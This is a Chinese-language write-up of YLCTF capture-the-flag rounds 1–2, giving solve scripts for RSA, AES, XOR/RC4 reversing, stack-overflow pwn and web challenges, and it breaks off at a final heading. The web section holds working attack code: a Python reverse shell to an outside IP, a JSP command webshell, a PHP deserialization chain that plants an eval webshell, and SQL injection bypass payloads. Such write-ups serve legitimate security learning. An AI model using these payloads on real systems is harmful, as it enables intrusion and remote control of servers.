前言:总排23,新生赛道11
Round 1
crypto
[round1]BREAK
e有范围,由于e的范围不算大,可以进行爆破得到e,求出d,解出flag
from Crypto.Util.number import *
from gmpy2 import invert, gcd
p = 112201812592436732390795120344111949417282805598314874949132199714697698933980025001138515893011073823715376332558632580563147885418631793000008453933543935617128269371275964779672888059389120797503550397834151733721290859419396400302434404551112484195071653351729447294368676427327217463094723449293599543541
q = 177020901129489152716203177604566447047904210970788458377477238771801463954823395388149502481778049515384638107090852884561335334330598757905074879935774091890632735202395688784335456371467073899458492800214225585277983419966028073512968573622161412555169766112847647015717557828009246475428909355149575012613
c = 2924474039245207571198784141495689937992753969132480503242933533024162740004938423057237165017818906240932582715571015311615140080805023083962661783117059081563515779040295926885648843373271315827557447038547354198633841318619550200065416569879422309228789074212184023902170629973366868476512892731022218074481334467704848598178703915477912059538625730030159772883926139645914921352787315268142917830673283253131667111029720811149494108036204927030497411599878456477044315081343437693246136153310194047948564341148092314660072088671342677689405603317615027453036593857501070187347664725660962477605859064071664385456
n = p * q
phi = (p - 1) * (q - 1)
def generate_primes(start, end):
primes = []
for num in range(start, end + 1):
if isPrime(num):
primes.append(num)
return primes
for e in generate_primes(55555, 66666):
if gcd(e, phi) == 1:
try:
d = invert(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m).decode('utf-8')
print(f"找到 e = {e}, 解密后的 flag: {flag}")
break
except ZeroDivisionError:
continue # 如果 invert 失败,则继续尝试下一个 e
except UnicodeDecodeError:
continue # 如果解码失败,则继续尝试下一个 e
# YLCTF{fbb6186c-6603-11ef-ba80-deb857dc15be}
[round1]signrsa
RSA 模数 n1 和 n2 之间有公因子 q,从而使得可以分别对这两个模数进行分解,然后使用对应的私钥对密文进行解密,通过共模攻击解密
import gmpy2
from Crypto.Util.number import *
n1 = 18674375108313094928585156581138941368570022222190945461284402673204018075354069827186085851309806592398721628845336840532779579197302984987661547245423180760958022898546496524249201679543421158842103496452861932183144343315925106154322066796612415616342291023962127055311307613898583850177922930685155351380500587263611591893137588708003711296496548004793832636078992866149115453883484010146248683416979269684197112659302912316105354447631916609587360103908746719586185593386794532066034112164661723748874045470225129298518385683561122623859924435600673501186244422907402943929464694448652074412105888867178867357727
n2 = 20071978783607427283823783012022286910630968751671103864055982304683197064862908267206049336732205051588820325894943126769930029619538705149178241710069113634567118672515743206769333625177879492557703359178528342489585156713623530654319500738508146831223487732824835005697932704427046675392714922683584376449203594641540794557871881581407228096642417744611261557101573050163285919971711214856243031354845945564837109657494523902296444463748723639109612438012590084771865377795409000586992732971594598355272609789079147061852664472115395344504822644651957496307894998467309347038349470471900776050769578152203349128951
e = 65537
q = gmpy2.gcd(n1,n2)
print(q)
# 10210039189276167395636779557271057346691950991057423589319031237857569595284598319093522326723650646963251941930167018746859556383067696079622198265424441
p1 = n1 // q
p2 = n2 // q
d1 = gmpy2.invert(e,(q-1)*(p1-1))
d2 = gmpy2.invert(e,(q-1)*(p2-1))
c = 17087345023822081623891751423634072935359933429883025338799316908134539732911987403379813791051721409025872046014445468757120127961953783792146805906255385927316168869306218712056692227481252348951991457948040258007096536015704568840248330993815252823424627958278346871867901249369170134106070695916355118499922945313335801615652226556995849239616859826762866841805915253356402366997693599487016453619500217382302173033771577307792501865322742699412806457301297719922487797626724702793650939979227432331932830374740050145956182452965260035182810782721888226896944881610943610565496963461471122317296063535420461202109
m = pow(c,d2,n2)
m = pow(m,d1,n1)
print(long_to_bytes(m))
# b'YLCTF{6567543c-e55b-4563-96ea-e7412e6834c2}\n'
[round1]ezrsa
也是类共模攻击
from Crypto.Util.number import long_to_bytes, inverse
from math import gcd
hint = 74749248594786596691182255254760227675255640419811402596325257219264047909491854266322448991637721043565574231631858096560042784343181104155107927958136483921037567399591407065870395299938514992590953052021824859260647798407649617552126176876304021384535351268838294566489926141346712140945311688664783400430
n = 146150746308368977558105420785404636106107297097656606561134260305844960246816673265377081884447744494438593580830134146856713782255534506122943914554490808124199966427121519694676728571857729213721192818898378912680306144869946238782714021401494162427357692727211780506245166118326256365562777182481342235649
c = 12817272835509631426126672293486991243028800172545793296231214648592002361121076145968763436527652893903622692932403498323802323146995559960945697843044017192966527560462131618029760025950956635249851792561073659666145624864040328809279977987225518572316396679320621448299428750551755789817002220213790188515
e = 65537
p = gcd(pow(20240918, e, n) - hint, n)
q = n // p
d = inverse(e, (p - 1) * (q - 1))
flag = long_to_bytes(pow(c, d, n))
print(flag)
# b'YLCTF{12f142fc-351d-486f-aaa6-b64ebf3e7bdf}\n'
[round1]r(A)=3
典型的矩阵问题,进行交互循环300次得到flag
from pwn import *
import numpy as np
p = remote('challenge.yuanloo.com', 23115)
for attempt in range(300):
try:
print(f"Attempt {attempt + 1}...")
line = p.recvuntil(":".encode())
print(f"Received: {line.decode().strip()}")
line = p.recvuntil("x=".encode())
equation_str = line.decode().strip()
print(f"Received: {equation_str}")
equations = equation_str.split("\n")
A = []
B = []
for i, eq in enumerate(equations):
if i == len(equations) - 1: # 忽略最后一行
continue
left, right = eq.split("=")
B.append(float(right.strip()))
# 提取系数
coefficients = [0, 0, 0] # 对应 x, y, z 的系数
for term in left.split("+"):
term = term.strip()
if "x" in term:
coefficients[0] = float(term.split("*")[0]) if "*" in term else 1.0
elif "y" in term:
coefficients[1] = float(term.split("*")[0]) if "*" in term else 1.0
elif "z" in term:
coefficients[2] = float(term.split("*")[0]) if "*" in term else 1.0
A.append(coefficients)
A = np.array(A)
B = np.array(B)
solution = np.linalg.solve(A, B)
p.sendline(str(int(solution[0])))
print(f"{solution[0]}")
line = p.recvuntil("y=".encode())
print(f"Received: {line.decode().strip()}")
p.sendline(str(int(solution[1])))
print(f"{solution[1]}")
line = p.recvuntil("z=".encode())
print(f"Received: {line.decode().strip()}")
p.sendline(str(int(solution[2])))
print(f"{solution[2]}")
except Exception as e:
print(f"Attempt {attempt + 1} failed: {e}")
p.interactive()
[round1]threecry
参考文章https://blog.csdn.net/luochen2436/article/details/131948093
import gmpy2
from Crypto.Util.number import long_to_bytes
e = 0xe18e
crypto05= 16623038441079077059861502314553840945014390827451667324209537222817794990697456726185616589892380248771957751215156366431853682717356212256182541599038824352426429058283605462766315213017886613935143369630579915129950428539117781616821575904280675596170305716041161748779293269633614559889401304768245038227061
crypto03= 7370478569029817135349016311298954172270465460003018672225010525611372855698643108316167758095660953716705265165460646442696451806405620591202977137450538604803993325516057226246866037605963589652887018894515430484657967483718879717967258257252134148706147029651520914313120373591263784166639605955378617102045
number1 = 6035830951309638186877554194461701691293718312181839424149825035972373443231514869488117139554688905904333169357086297500189578624512573983935412622898726797379658795547168254487169419193859102095920229216279737921183786260128443133977458414094572688077140538467216150378641116223616640713960883880973572260683
number2 = 20163906788220322201451577848491140709934459544530540491496316478863216041602438391240885798072944983762763612154204258364582429930908603435291338810293235475910630277814171079127000082991765275778402968190793371421104016122994314171387648385459262396767639666659583363742368765758097301899441819527512879933947
a_near = gmpy2.iroot(number2//325,2)[0]
while number2 % gmpy2.next_prime(13*a_near)!=0:
a_near = gmpy2.next_prime(a_near)
p = gmpy2.next_prime(13*a_near)
q = number2//p
phi = (p-1)*(q-1)
t = gmpy2.gcd(e, phi)
d = gmpy2.invert(e // t, phi)
m2 = gmpy2.iroot(pow(crypto05, d, number2), t)[0]
flag2 = long_to_bytes(m2)
d1 = gmpy2.invert(number1, phi)
m1 = pow(crypto03, d1, number2)
flag1 = long_to_bytes(m1)
print(flag1 + flag2)
# b'YLCTF{8d547f68-f394-4254-9ada-2dc306862b66}\n'
Misc
[签到] 打卡小能手
[Round 1] hide_png
给的图片用stegsolve来看,有点模糊但是可以看看
flag没存忘了
[Round 1] pngorzip
save bin形式得到zip,010去掉114514????后面的冗杂内容进行掩码攻击得到giao,解压得到flag
YLCTF{d359d6e4-740a-49cf-83eb-5b0308f09c8c}
[Round 1] plain_crack
尝试再写个压缩包进行明文攻击
import zipfile
import os
def create(files, zfile):
# 创建一个新的 ZIP 文件
with zipfile.ZipFile(zfile, 'w') as zipf:
for file in files:
zipf.write(file, os.path.basename(file), compress_type=zipfile.ZIP_DEFLATED)
if __name__ == '__main__':
files = ['build.py']
zfile = 'crack2.zip'
create(files, zfile)
pyadminzip我本地的轮子有问题就用了zipfile需要测试几次才可以进行明文攻击,等待几分钟直接解压里面有flag.docx,docx也是一种zip文件形式,改成zip里面有个图片得到flag
[Round 1] trafficdet
是个ai模型分析,把要求告诉chatgpt上传对应的文件然后叫他按形式写出解密脚本就可以了
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
def load_and_preprocess_data(train_file, test_file):
# Load training data
train_data = pd.read_csv(train_file)
train_data = train_data.dropna()
# Separate features and labels
X = train_data.drop(columns=['Label'])
y = train_data['Label']
# Load test data
test_data = pd.read_csv(test_file)
return X, y, test_data
def train_model(X_train, y_train, n_estimators=100, random_state=42):
model = RandomForestClassifier(n_estimators=n_estimators, random_state=random_state)
model.fit(X_train, y_train)
return model
def evaluate_model(model, X_val, y_val):
y_pred = model.predict(X_val)
accuracy = accuracy_score(y_val, y_pred)
print(f'Model Accuracy: {accuracy:.2f}')
return y_pred
def make_predictions(model, X_test):
return model.predict(X_test)
def save_results(predictions, output_file):
result = pd.DataFrame({'Label': predictions})
result.index += 1 # Start index at 1
result.index.name = 'id' # Rename index to 'id'
result.to_csv(output_file, index=True) # Ensure the index is saved
if __name__ == "__main__":
# Load and preprocess data
X, y, test_data = load_and_preprocess_data('train.csv', 'test.csv')
# Split the training data into training and validation sets
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.1, random_state=42)
# Train the model
model = train_model(X_train, y_train)
# Evaluate the model
evaluate_model(model, X_val, y_val)
# Make predictions on the test data
test_preds = make_predictions(model, test_data)
# Save the results
save_results(test_preds, 'result.csv')
[Round 1] whatmusic
可以发现password单独解压,010研究是图片逆转写个脚本
with open('password','rb') as f:
with open('flag','wb') as g:
g.write(f.read()[::-1])
然后导入010改文件尾,得到图片,然后还需要镜像一下,再进行在线网站的镜像处理得到password,然后进行解压
然后就没有思路了,给了hint也看不懂,信息收集后发现
死去的记忆痛击我,在今年的iscc里面就有一题是github上面的lyra项目转音频得到wav的题目,主要是要搭建环境,我这里用了香港的vps搭建版本ubuntu20,参考文章Lyra编码器基础环境搭建_lyra dajian-CSDN博客
环境构造搭好之后用xftp传入文件然后得到wav,多听几遍得到了flag
Pwn
[Round 1] giaopwn
有nx保护
vuln有溢出点,查一下是有system和cat flag的
利用寄存器rbi放入地址
from pwn import *
p = remote("challenge.yuanloo.com",44805)
payload= b'a'*(0x28)+p64(0x400743)+p64(0x601048)+p64(0x4006D2)
p.sendline(payload)
p.interactive()
Re
[round1]xor
简单测试一下发现有upx,脱壳一下
分析一下简单的异或直接gpt梭个脚本
encrypted_bytes = [
0x45, 0x50, 0x5f, 0x48, 0x5A, 0x67, 0x25, 0x2F,
0x7E, 0x7D, 0x79, 0x29, 0x7A, 0x7D, 0x31, 0x7D,
0x29, 0x7D, 0x2E, 0x31, 0x28, 0x7D, 0x28, 0x2B,
0x31, 0x25, 0x2A, 0x25, 0x2D, 0x31, 0x2B, 0x79,
0x2A, 0x2B, 0x29, 0x2B, 0x29, 0x79, 0x28, 0x2A,
0x2F, 0x29, 0x61, 0x1C
]
# 解密函数
def decrypt(encrypted_bytes):
decrypted_bytes = []
for byte in encrypted_bytes:
decrypted_byte = byte ^ 0x1C
decrypted_bytes.append(decrypted_byte)
return decrypted_bytes
decrypted_values = decrypt(encrypted_bytes)
decrypted_string = ''.join(chr(b) for b in decrypted_values)
print(decrypted_string)
[round1]ezgo
ida看一下加密逻辑
encrypted_bytes = [
108, 122, 116, 108, 127, 65, 94, 90, 12, 15,
15, 120, 113, 118, 110, 34, 115, 112, 36, 101,
125, 46, 121, 47, 96, 119, 119, 53, 101, 127,
50, 101, 96, 100, 110, 59, 109, 57, 98, 56,
57, 56, 34
]
def decrypt(encrypted):
decrypted = []
for i, byte in enumerate(encrypted):
decrypted_byte = byte ^ (i + 53)
decrypted.append(decrypted_byte)
return bytes(decrypted)
decrypted_bytes = decrypt(encrypted_bytes)
print(decrypted_bytes.decode('utf-8', errors='ignore'))
[round1]xorplus
ida打开分析一下是rc4的加密逻辑,没学会,一股脑把加密逻辑扔给claude帮我解密,出脚本
def rc4_init(key):
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + ord(key[i % len(key)]) + 1300) % 256
S[i], S[j] = S[j], S[i]
return S
def rc4_crypt(S, data):
i = j = 0
result = []
for byte in data:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
k = S[(S[i] + S[j]) % 256]
result.append(((byte - 20) & 0xFF) ^ k)
return bytes(result)
def main():
key = "welcometoylctf"
encrypted_data = [0x91, 0x86, 0x1b, 0x2d, 0x9e, 0x6f, 0x57, 0x5d, 0x44, 0xec, 0xa3, 0x9f, 0xcd, 0x89, 0x22, 0x65,
0x3b, 0xa3, 0x60, 0x2d, 0x80, 0x54, 0x78, 0x67, 0x6c, 0x4e, 0x81, 0x53, 0x4d, 0x26, 0x8, 0x96,
0x84, 0x46, 0x29, 0xc5, 0xb4, 0x7e, 0x29, 0xc5, 0xb9, 0x87, 0xa6]
S = rc4_init(key)
decrypted = rc4_crypt(S, encrypted_data)
print("Decrypted message:", decrypted.decode('ascii'))
if __name__ == "__main__":
main()
[round 1]calc
分析解密的源码
#include<stdio.h>
#include<math.h>
#include<string.h>
#include<stdlib.h>
typedef struct Stack {
double* low;
int size;
double* top;
} stack;
void init(stack* s) {
s->size = 100;
s->low = (double*)malloc((sizeof(double)) * 100);
s->top = s->low;
}
void push(stack* s, double e) {
*(s->top) = e;
s->top++;
}
void pop(stack* s, double* e) {
s->top--;
*e = *(s->top);
}
int main() {
setbuf(stdin, 0);
setbuf(stdout, 0);
stack s;
double e, d;
char ch;
double d, e;
init(&s);
char num[100];
int i = 0;
puts("input data, end of '#'");
scanf("%c", &ch);
while (ch != '#') {
while (ch >= '0' && ch <= '9') {
num[i] = ch;
i++;
scanf("%c", &ch);
}
if (ch == ' ') {
num[i] = '\0';
d = atof(num);
push(&s, d);
i = 0;
} else {
switch (ch) {
case '+':
pop(&s, &d);
pop(&s, &e);
push(&s, e + d);
break;
case '-':
pop(&s, &d);
pop(&s, &e);
push(&s, e - d);
break;
case '*':
pop(&s, &d);
pop(&s, &e);
push(&s, e * d);
break;
case '/':
pop(&s, &d);
pop(&s, &e);
push(&s, e / d);
break;
}
}
scanf("%c", &ch);
if (d == 125) {
printf("%s", getenv("GZCTF_FLAG"));
}
}
return 0;
}
程序使用逆波兰表示法(Reverse Polish Notation,RPN)进行计算。当栈顶的值达到 125 时,程序会输出 GZCTF_FLAG。
在栈顶产生值 125。所以能在栈顶产生 125 的 RPN 表达应该是有效的输入
5 5 * 5 * #
尝试了一些其他的没有成功这个是成功的
Web
[Round 1] Disal
看不出东西,看看robots.txt,有提示去f1ag.php
<?php
show_source(__FILE__);
include("flag_is_so_beautiful.php");
$a=@$_POST['a'];
$key=@preg_match('/[a-zA-Z]{6}/',$a);
$b=@$_REQUEST['b'];
if($a>999999 and $key){
echo $flag1;
}
if(is_numeric($b)){
exit();
}
if($b>1234){
echo $flag2;
}
?>
a是匹配是否有六个字母,b是大于这个数就行函数构造绕过就行
import requests
url = 'http://challenge.yuanloo.com:21836/f1ag.php'
payload = {
'a': '1000000eeeeee',
'b': '1235abc'
}
response = requests.post(url, data=payload)
print(response.text)
[Round 1] shxpl
测试一下常见的ls和cat都被禁用了,这里空格用%09进行绕过,联合查询一下
然后执行cat /flag 参照上面的内容
[Round 1] Injct
简单测了一下是xss还是ssti,发现是flask的模板注入,测试一下常见的花括号被禁了,用fenjing看看内容
python -m fenjing crack --url http://challenge.yuanloo.com:25882/greet --inputs name --method POST
可以shell到但是试了常见的命令不能成功
考虑到这是python写的网站,用弹个shell给我的vps,成功拿到shell得到flag
python3 -c 'import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("8.130.42.113", 5566)); [os.dup2(s.fileno(), i) for i in (0, 1, 2)]; subprocess.call(["/bin/sh", "-i"])'
[Round 1] TOXEC(复现)
测试了一下发现上传jsp文件会直接杀掉,又dirsearch扫了一下发现在WEB-INF有大量的404回显,猜测可能和羊城杯的题目相似(虽然我没写bushi),先上传一个shell.xml,是jsp的回显马
先上传这个,bp抓包改一下文件名
<% if(request.getParameter("cmd")!=null){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.print(new String(b));
}
out.print("</pre>");
}
%>
然后再上传下面这个也需要改成对应的文件格式将上面的xml解析成jsp,传入马
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version="4.0">
<servlet>
<servlet-name>exec</servlet-name>
<jsp-file>/WEB-INF/shell.xml</jsp-file>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>exec</servlet-name>
<url-pattern>/orange</url-pattern>
</servlet-mapping>
</web-app>
最后的结果如下
[Round 1] pExpl(复现)
先上源码
<?php
error_reporting(0);
class FileHandler {
private $fileHandle;
private $fileName;
public function __construct($fileName, $mode = 'r') {
$this->fileName = $fileName;
$this->fileHandle = fopen($fileName, $mode);
if (!$this->fileHandle) {
throw new Exception("Unable to open file: $fileName");
}
echo "File opened: $fileName\n";
}
public function readLine() {
return fgets($this->fileHandle);
}
public function writeLine($data) {
fwrite($this->fileHandle, $data . PHP_EOL);
}
public function __destruct() {
if (file_exists($this->fileName) &&!empty($this->fileHandle)) {
fclose($this->fileHandle);
echo "File closed: {$this->fileName}\n";
}
}
}
class User {
private $userData = [];
public function __set($name, $value) {
if ($name == 'password') {
$value = password_hash($value, PASSWORD_DEFAULT);
}
$this->userData[$name] = $value;
}
public function __get($name) {
return $this->userData[$name] ?? null;
}
public function __toString() {
if(is_string($this->params) && is_array($this->data) && count($this->data) > 1){
call_user_func($this->data,$this->params);
}
return "Hello";
}
public function __isset($name) {
return isset($this->userData[$name]);
}
}
class Logger {
private $logFile;
private $lastEntry;
public function __construct($logFile = 'application.log') {
$this->logFile = $logFile;
}
private function log($level, $message) {
$this->lastEntry = "[" . date("Y-m-d H:i:s") . "] [$level] $message" . PHP_EOL;
file_put_contents($this->logFile, $this->lastEntry, FILE_APPEND);
}
public function setLogFile($logFile) {
$this->logFile = $logFile;
}
public function clearOldLogs($daysToKeep = 30) {
$files = glob("*.log");
$now = time();
foreach ($files as $file) {
if (is_file($file)) {
if ($now - filemtime($file) >= 60 * 60 * 24 * $daysToKeep) {
unlink($file);
}
}
}
}
public function __call($name, $arguments) {
$validLevels = ['info', 'warning', 'error', 'debug'];
if (in_array($name, $validLevels)) {
$this->log(strtoupper($name), $arguments[0]);
} else {
throw new Exception("Invalid log level: $name");
}
}
public function __invoke($message, $level = 'INFO') {
$this->log($level, $message);
}
}
if(isset($_GET['exp'])) {
if(preg_match('/<\?php/i',$_GET['exp'])){
exit;
}
$exp = unserialize($_GET['exp']);
throw new Exception("Test!");
} else {
highlight_file(__FILE__);
}
if(preg_match('/<\?php/i',$_GET['exp'])){
exit;
}
$exp = unserialize($_GET['exp']);
throw new Exception("Test!");
根据这里可以使用php的短标签,throw new Exception("Test!");可以利用GC机制进行绕过,简单的来说就用构造数组进行绕过
再分析一下上面的pop链
public function __destruct() {
if (file_exists($this->fileName) &&!empty($this->fileHandle)) {
fclose($this->fileHandle);
echo "File closed: {$this->fileName}\n";
}
}
echo可以触发__toString魔术
public function __toString() {
if(is_string($this->params) && is_array($this->data) && count($this->data) > 1){
call_user_func($this->data,$this->params);
}
return "Hello";
}
call_user_func 函数用于回调构造,不能直接触发命令执行,由于有参数限制,也不能直接调用,可以尝试构造不存在的函数以此来触发__call魔术
public function __call($name, $arguments) {
$validLevels = ['info', 'warning', 'error', 'debug'];
if (in_array($name, $validLevels)) {
$this->log(strtoupper($name), $arguments[0]);//调用 log 方法,传递日志级别(转换为大写)和第一个参数 $arguments[0],这通常是要记录的消息。
} else {
throw new Exception("Invalid log level: $name");
}
}
需要调用到 array 中的一个,然后在触发文件写入,构造exp
<?php
class FileHandler {
private $fileHandle;
private $fileName;
public function __construct($fileName) {
$this->fileName = $fileName;
}
}
class User {
private $userData = [];
}
class Logger {
private $logFile;
private $lastEntry;
public function __construct($logFile) {
$this->logFile = $logFile;
}
}
// 创建 Logger 对象
$c = new Logger("/var/www/html/1.php");
// 创建 User 对象
$b = new User();
// 为 User 对象的属性赋值
$b->data = [$c, "info"];
$b->params = '<?=@eval($_POST[1]);?>';
// 创建 FileHandler 对象,传入 User 对象
$a = new FileHandler($b);
// 序列化并替换特定字符串
$a1 = array($a, null);
$s = serialize($a1);
$s = str_replace('1;N', '0;N', $s);
// 输出 URL 编码后的字符串
echo urlencode($s);
?>
[Round 1] sInXx(复现)
这题在写的时候一直没找到注入点,跟着复现一下
search=juan79%27%09and%09(1=1)%23
这个是有回显的,看下面的
search=juan79%27%09and%09(1=2)%23
这个就是无回显的
然后接着继续测试一下
search=juan79%27%09union%09select%091,2,3,4%23
测试发现,应该被过滤了,可以用别名进行查询
search=1'%09UNION%09SELECT%09*%09FROM%09((SELECT%091)A%09join%09(SELECT%091)B%09join(SELECT%091)C%09join%09(SELECT%091)D%09join%09(SELECT%091)E)#
继续测(不是MySQL的数据库,而是sql sever的数据库)
sys.schema_table_statistics_with_buffer 是一个系统表,通常在 SQL Server 中存在,包含关于表的统计信息。
search=1'%09UNION%09SELECT%09*%09FROM%09((SELECT%09GROUP_CONCAT(TABLE_NAME)FROM%09sys.schema_table_statistics_with_buffer%09WHERE%09TABLE_SCHEMA=DATABASE())A%09join%09(SELECT%091)B%09join(SELECT%091)C%09join%09(SELECT%091)D%09join%09(SELECT%091)E)#
继续往下测
search=1'%09UNION%09SELECT%09*%09FROM%09((SELECT%09`2`%09FROM%09(SELECT%09*%09FROM%09((SELECT%091)a%09JOIN%09(SELECT%092)b)%09UNION%09SELECT%09*%09FROM%09DataSyncFLAG)p%09limit%092%09offset%091)A%09join%09(SELECT%091)B%09join(SELECT%091)C%09join%09(SELECT%091)D%09join%09(SELECT%091)E)#
最后得到了flag这个数据库没怎么遇见过涨知识了,
还有一道java我最近刚开始学,先不复现了。
Round 2
crypto
[Round 2] ezAES
key和iv需要进行填充,得到字符串只会输入靶场得到flag
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
def adjust_bytes(data, size):
return data[:size].ljust(size, b'\0')
# Adjust key and IV to be exactly 16 bytes
key = adjust_bytes(b'YLCTF-CRYPTO', 16)
iv = adjust_bytes(b'YLCTF-IV', 16)
print("Key:", key)
print("IV:", iv)
# The encrypted data
encrypted_data = b'\xed\x1d]\xe6p\xb7\xfa\x90/Gu\xf4\xe2\x96\x84\xef90\x92e\xb4\xf8]"\xfc6\xf8\x8cS\xe9b\x19'
# Create the AES cipher object
cipher = AES.new(key, AES.MODE_CBC, iv)
# Decrypt the data
decrypted_data = cipher.decrypt(encrypted_data)
# Remove padding
try:
unpadded_data = unpad(decrypted_data, AES.block_size)
# Convert to string
flag = unpadded_data.decode('utf-8')
print("Decrypted flag:", flag)
except ValueError as e:
print("Decryption failed. Error:", str(e))
print("Raw decrypted data:", decrypted_data)
[Round 2] ancat(三血)
通过反 Arnold 变换对图像进行解码
import cv2
import numpy as np
def arnold_decode(image, shuffle_times, a, b):
decode_image = np.zeros(shape=image.shape, dtype=np.uint8)
h, w = image.shape[0], image.shape[1]
N = h # Assuming square image, otherwise use min(h, w)
for _ in range(shuffle_times):
for x in range(h):
for y in range(w):
new_x = ((a*b+1)*x + (-b)*y) % N
new_y = (-a*x + y) % N
decode_image[new_x, new_y, :] = image[x, y, :]
image = np.copy(decode_image)
cv2.imwrite('de_flag.png', decode_image, [int(cv2.IMWRITE_PNG_COMPRESSION), 0])
return decode_image
# Usage
img = cv2.imread('en_flag.png')
decoded_img = arnold_decode(img, 3, 6, 9)
[Round 2] hhhhhash(二血)
通过 RSA 加密和解密的操作,生成一个由 2 和 3 相关的预映像。该预映像是由两个固定值 2 和 3,以及它们加密后异或的解密结果组成的字符串。
from Crypto.Util.number import inverse
# 给定的 RSA 参数
N = 24187393262220937846390501443742832858626434119009614437585110078354058452015513549456536194956883531427150348615517313864237793745207153851247294085645697596388459039963846522372296585446089302800483043022329465803710493794211051569707438274254451965191340677881575500674368344178840546343108889174677894222885416258598492663798090390503785098514218961277236306118846673370386248291600553097856252637702622367340613301550171775336709322733018489345819827313673171715980174821509418454309036717777663660169340209676530313209371349708592854940984111594670893579387030559835418881208057159859916049414143236495356055079
e = 65537
# 计算 c = pow(2, e, N) ^ pow(3, e, N)
c = pow(2, e, N) ^ pow(3, e, N)
# 计算 phi 和 d
phi = N - 1 # 注意:这个假设只在 N 是梅森素数时成立
d = inverse(e, phi)
# 计算 x
x = pow(c, d, N)
# 将结果转换为字节并编码为十六进制
b0 = (2).to_bytes(256, 'big').hex()
b1 = (3).to_bytes(256, 'big').hex()
b2 = x.to_bytes(256, 'big').hex()
# 组合最终的 preimage
preimage = b0 + b1 + b2
print("Calculated preimage:")
print(preimage)
[Round 2] rand(一血)
参考ASIS2023 Crypto - 知乎 (zhihu.com)
from pwn import *
import re
p = remote('challenge.yuanloo.com', 46464)
for _ in range(400): # 本地测试不知道要多少轮,直接拉到400得到flag会自己断的
line = p.recvuntil("\n".encode())
line_decoded = line.decode()
print(line_decoded) # 打印解码后的内容
numbers = re.findall(r'\d+', line_decoded)
if numbers:
p_value = int(numbers[0])
g = p_value - 4
print("p =", p_value)
line = p.recvuntil("g:".encode())
print(line.decode())
p.sendline(str(g).encode())
print("g =", g)
line = p.recvuntil(":".encode())
print(line.decode())
x = 2
y = p_value - 2
p.sendline(f"{x},{y}".encode())
print(f"Sending: {x},{y}")
p.interactive()
Misc
[Round 2] IMGAI(三血)
和iscc 2024的re题有点相似,也是需要识别图片转得知文字,利用模型得到答案
from pwn import *
import torch
import torch.nn as nn
from torchvision import transforms
from PIL import Image
import numpy as np
import re
class MNISTCNN(nn.Module):
def __init__(self):
super(MNISTCNN, self).__init__()
self.conv1 = nn.Conv2d(1, 32, kernel_size=5, padding=2)
self.conv2 = nn.Conv2d(32, 64, kernel_size=5)
self.fc1 = nn.Linear(64 * 5 * 5, 1024)
self.fc2 = nn.Linear(1024, 10)
self.pool = nn.MaxPool2d(2, 2)
self.relu = nn.ReLU()
def forward(self, x):
x = self.pool(self.relu(self.conv1(x)))
x = self.pool(self.relu(self.conv2(x)))
x = x.view(-1, 64 * 5 * 5)
x = self.relu(self.fc1(x))
return self.fc2(x)
def load_model(model_path):
model = MNISTCNN()
model.load_state_dict(torch.load(model_path, map_location=torch.device('cpu')))
model.eval()
return model
def preprocess_image(binary_data):
image_array = np.array([int(pixel) for pixel in binary_data]).reshape(480, 640)
image = Image.fromarray(np.uint8(image_array * 255), mode='L')
transform = transforms.Compose([
transforms.Resize((28, 28)),
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
return transform(image).unsqueeze(0)
def predict_digit(model, image):
with torch.no_grad():
output = model(image)
return torch.max(output, 1)[1].item()
def main():
try:
p = remote("challenge.yuanloo.com", 30991)
model = load_model('model.pth')
predictions = []
for i in range(36):
try:
data = p.recvuntil(f"input num {i + 1} \n".encode(), timeout=3)
binary_data = re.findall(r"[01]+", data.decode())
if not binary_data:
print(f"No binary data found in round {i + 1}. Exiting...")
break
image = preprocess_image(binary_data[0].strip())
predicted = predict_digit(model, image)
predictions.append(predicted)
p.sendline(str(predicted).encode())
print(f"Round {i + 1}: Predicted digit: {predicted}")
except EOFError:
print(f"Connection closed unexpectedly in round {i + 1}")
break
except Exception as e:
print(f"Error in round {i + 1}: {str(e)}")
break
final_data = p.recvall(timeout=5)
print("Final server response:", final_data.decode())
predicted_string = ''.join(map(str, predictions))
print("All predicted digits as a string:", predicted_string)
except Exception as e:
print(f"An error occurred: {str(e)}")
finally:
if 'p' in locals():
p.close()
if __name__ == "__main__":
main()
[Round 2] Trace
图片用010打开发现后面一大段有base64编码,去赛博转换一下得到一个rar文件,PassFabforRAR解密一下,得到密码370950解密得到里面的图片
仔细在记事本上研究了一会拼出了flag
YLCTF{ccfe9e2c-391f-4055-a128-c06b65426c83}
Pwn
[Round 2] ezstack2
有nx保护
ida看,stack里有栈溢出,vuln里有判断执行system(“sh”)。
通过read栈溢出触发puts函数的调用,并通过GOT地址泄露libc的地址.
使用ROPgadget获取pop_rdi和ret地址,通过read栈溢出触发puts函数的调用,并通过GOT地址泄露libc地址,最后泄露libc地址和执行system
from pwn import *
from LibcSearcher import *
p = remote('challenge.yuanloo.com', 25160)
elf = ELF('./pwn')
rdi = 0x400823
main = 0x40070A
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
payload1 = b'a' * (0x30 + 8) + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
p.sendline(payload1)
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc = LibcSearcher('puts', puts_addr)
libcbase = puts_addr - libc.dump('puts')
sys = libcbase + libc.dump('system')
binsh = libcbase + libc.dump('str_bin_sh')
payload2 = b'a' * (0x30 + 8) + p64(0x40056e) + p64(rdi) + p64(binsh) + p64(sys)
p.sendline(payload2)
p.interactive()
Re
[Round 2] 三点几啦饮茶先
